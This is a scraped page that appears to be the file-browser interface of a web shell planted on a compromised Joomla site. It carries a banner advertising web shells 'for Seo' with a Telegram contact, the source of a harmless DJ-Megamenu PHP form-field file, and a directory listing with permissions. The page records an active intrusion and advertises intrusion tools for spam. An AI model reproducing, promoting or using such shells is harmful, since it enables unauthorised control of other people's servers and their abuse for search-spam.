__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * @package DJ-Megamenu * @copyright Copyright (C) DJ-Extensions.com, All rights reserved. * @license http://www.gnu.org/licenses GNU/GPL * @author url: http://dj-extensions.com * @author email [email protected] * @developer Szymon Woronowski, Artur Kaczmarek * */ defined('JPATH_PLATFORM') or die; use Joomla\CMS\Form\FormField; use Joomla\CMS\Factory; use Joomla\CMS\Language\Text; /** * Form Field class for the Joomla Platform. * Supports a one line text field. * * @link http://www.w3.org/TR/html-markup/input.text.html#input.text * @since 11.1 */ class JFormFieldDJOnlyPro extends FormField { /** * The form field type. * * @var string * @since 11.1 */ protected $type = 'DJOnlyPro'; /** * Method to get the field input markup. * * @return string The field input markup. * * @since 11.1 */ protected function getInput() { $lang = Factory::getLanguage(); $lang->load('mod_djmegamenu', JPATH_ROOT, 'en-GB', true, false); $lang->load('mod_djmegamenu', JPATH_ROOT . '/modules/mod_djmegamenu', 'en-GB', true, false); $lang->load('mod_djmegamenu', JPATH_ROOT, null, true, false); $lang->load('mod_djmegamenu', JPATH_ROOT . '/modules/mod_djmegamenu', null, true, false); $html = Text::sprintf('MOD_DJMEGAMENU_GET_PRO_LINK', Text::_('MOD_DJMEGAMENU_ONLY_PRO')); return $html; } }
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| djcolor.php | File | 7.06 KB | 0664 |
|
| djfolderlist.php | File | 5.79 KB | 0664 |
|
| djmobilebutton.php | File | 1.28 KB | 0664 |
|
| djmodules.php | File | 1.55 KB | 0664 |
|
| djonlypro.php | File | 1.4 KB | 0664 |
|
| djspacer.php | File | 3.07 KB | 0664 |
|
| djupdater.php | File | 2.98 KB | 0664 |
|